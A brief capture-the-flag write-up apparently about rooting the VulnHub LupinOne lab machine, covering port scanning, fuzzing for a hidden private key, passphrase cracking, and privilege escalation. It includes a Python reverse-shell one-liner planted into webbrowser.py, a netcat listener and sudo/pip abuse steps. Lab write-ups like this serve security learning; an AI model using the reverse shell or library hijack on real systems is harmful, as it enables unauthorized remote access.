Apr 28
VulnHub: LupinOne
Today we will take a look at Vulnhub: LupinOne. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open 192.168.0.110 — open
Let’s look at the “~ myfiles” extension.
- FFUF
Command: ffuf -u ‘http://lupin/~FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here we have a username. Now let’s find his private key file. As we know, private keys “.” is written after the symbol.
Command: ffuf -u ‘http://lupin/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub -fw 20
We found the encrypted text. Let’s look at cyberchef to decrypt. After researching, I found that it was base58
Let’s check the connection to the target machine.
We use the fasttrack.txt file to crack the passphrase password, as stated in the message.
Command: echo ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’ >> /usr/lib/python3.9/webbrowser.py
Command: nc -nvlp 4242
Command: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
https://gtfobins.github.io/gtfobins/pip/
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
